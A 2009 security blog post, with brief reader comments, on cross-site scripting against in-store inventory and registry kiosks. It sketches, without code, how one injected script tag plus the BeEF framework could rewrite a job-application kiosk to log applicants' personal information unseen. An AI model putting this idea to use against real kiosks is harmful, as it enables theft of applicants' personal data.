Skeptikal.org

Monday, November 16, 2009

XSS Kiosk Busting

You know those kiosks that you find in bookstores for looking up inventory? The idea of XSS-ing one occured to me a few years ago, but I never really got a chance to play with any and forgot about it until recently. I was at Sur La Table last weekend, trying to figure out which kitchen supplies I haven't bought yet (turns out, it was more knives), and noticed the wedding/gift registry...



Mostly, I just think this is funny, but there are potential malicious applications for this kind of thing. For example, Wal-mart's job applications are done through a web application running on a kiosk in the customer service area. If you can inject javascript into that application, you could rewrite the whole thing to log personal information from applicants.

Presuming that those computers are connected to the internet (and I expect they are), it would only require that you inject a single <script> tag, and you could do all the rest with BeEF. Since it's a kiosk, nobody is able to look at the address bar or status bar and see that anything is wrong.

Labels: ,

posted by mckt at 2:47 PM

6 Comments:

  • http://sla.ckers.org/forum/read.php?2,32184,32184#msg-32184

    By Anonymous Anonymous, At November 30, 2009 2:06 PM  

  • *facepalm* ... that's about all I can add to this one!

    Seems that the "cool" thing to do is put everyone "on the web" these days at the large corporations, particularly job application sites ... gee - I wonder how many "online job app sites" are vulnerable.

    *gets an idea* ... ruh-roh.

    By Anonymous Raf, At November 30, 2009 2:06 PM  

  • Did something similar @ the airport http://sla.ckers.org/forum/read.php?2,32184,32184#msg-32184

    By Anonymous Anonymous, At November 30, 2009 2:06 PM  

Post a Comment



<< Home